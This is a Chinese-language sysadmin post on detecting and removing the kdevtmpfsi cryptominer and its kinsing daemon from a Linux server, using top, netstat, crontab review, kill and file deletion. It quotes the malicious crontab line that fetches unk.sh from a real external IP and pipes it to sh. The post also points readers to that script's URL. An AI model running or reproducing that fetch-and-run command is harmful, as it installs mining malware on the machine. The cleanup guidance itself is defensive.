服务器CPU资源占用一直处于100%的状态,检查发现是kdevtmpfsi占用导致的,此进程为挖矿程序。
处理步骤如下:
kdevtmpfsi 进程处理:
1、# top
查看cpu占用情况,找到占用cpu的进程 最后是 kdevtmpfsi
2、# netstat -natp
根据上面的进程名查看与内网的 tcp 链接异常 ,看到陌生ip,查出为国外ip,估计主机被人种后门了
此时,挖矿脚本大概率定时在你的crontab里面。
crontab -l ,发现异常定时任务,* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
有兴趣可以研究这个sh脚本 http://195.3.146.118/unk.sh
3、解决方法
kdevtmpfsi有守护进程,单独kill掉 kdevtmpfsi 进程会不断恢复占用。守护进程名称为 kinsing,需要kill后才能解决问题。
#查询关联的守护进程
[root@iZwz97v9b9ili0mz7rl188Z overlay2]# systemctl status 2854
● session-5649.scope - Session 5649 of user root
Loaded: loaded (/run/systemd/system/session-5649.scope; static; vendor preset: disabled)
Drop-In: /run/systemd/system/session-5649.scope.d
└─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.conf
Active: active (abandoned) since 一 2019-12-23 10:41:33 CST; 2 days ago
CGroup: /user.slice/user-0.slice/session-5649.scope
├─ 2854 /tmp/kdevtmpfsi
└─18534 ./kinsing1oZIY4Aid7
具体命令:
systemctl status 23437
ps -aux | grep kinsing
ps -aux | grep kdevtmpfsi
kill -9 23437
kill -9 18534
cd /tmp
ls
rm -rf kdevtmpfsi
rm -rf /var/tmp/kinsing 记得这个守护进程的文件也要删掉,找不到的话,也可以用这个命令
find / -name kdevtmpfsi
find / -name kinsing
进入/var/spool/cron 查看是否有相关的木马定时任务在执行 有的话删掉再重启下crontab